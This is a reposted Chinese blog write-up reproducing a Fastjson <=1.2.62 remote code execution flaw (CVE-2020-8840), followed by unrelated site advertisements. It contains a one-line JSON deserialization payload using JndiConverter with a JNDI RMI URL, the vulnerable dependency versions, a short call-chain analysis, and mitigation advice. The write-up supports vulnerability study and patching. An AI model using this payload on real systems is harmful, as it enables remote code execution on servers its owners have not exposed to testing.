Fastjson <=1.2.62 远程代码执行-漏洞复现

栏目: IT技术 · 发布时间: 5年前

内容简介:Fastjson<=1.2.62需要开启autotypepoc:

影响范围:

Fastjson<=1.2.62

需要开启autotype

poc:

String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";

pom:

    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.62</version>
    </dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>



tips:这里需要另外导入jar包才能测试

Fastjson <=1.2.62 远程代码执行-漏洞复现

该黑名单主要来自于jackson- CVE-2020-8840

https://nvd.nist.gov/vuln/detail/CVE-2020-8840

漏洞复现:

Fastjson <=1.2.62 远程代码执行-漏洞复现

漏洞分析

Fastjson <=1.2.62 远程代码执行-漏洞复现

这里明显存在jndi注入,但是toObjectImpl不满足fastjson调用规则,因此查看其父类函数

Fastjson <=1.2.62 远程代码执行-漏洞复现

其父类中在toObject函数中调用了它,但是仍然不满足调用条件,因此继续溯源

Fastjson <=1.2.62 远程代码执行-漏洞复现

可以看到在setAsText函数中调用了toObject函数,并且setAstext满足调用规则,因此payload即打

Fastjson <=1.2.62 远程代码执行-漏洞复现

修复建议:

1.关了autotype,用白名单(推荐)

2.升级jdk()不太现实)


以上所述就是小编给大家介绍的《Fastjson <=1.2.62 远程代码执行-漏洞复现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

电子商务:管理与社交网络视角(原书第7版)

电子商务:管理与社交网络视角(原书第7版)

(美)埃弗雷姆·特班(Efraim Turban)、戴维.金(David King)、李在奎、梁定澎、德博拉·特班(Deborrah Turban) / 时启亮、陈育君、占丽 / 机械工业出版社 / 2014-1-1 / 79.00元

本书对电子学习、电子政务、基于web的供应链、协同商务等专题进行了详细的介绍,全书涵盖丰富的资料以及个案,讨论了Web 2.0环境内的产业结构、竞争变化以及对当今社会的影响。另外,本书在消费者行为、协同商务、网络安全、网络交易及客户管理管理、电子商务策略等内容上都有最新的改编,提供读者最新颖的内容,贴近当代电子商务的现实。 本书适合高等院校电子商务及相关专业的本科生、研究生及MBA学员,也可......一起来看看 《电子商务:管理与社交网络视角(原书第7版)》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

JSON 在线解析
JSON 在线解析

在线 JSON 格式化工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具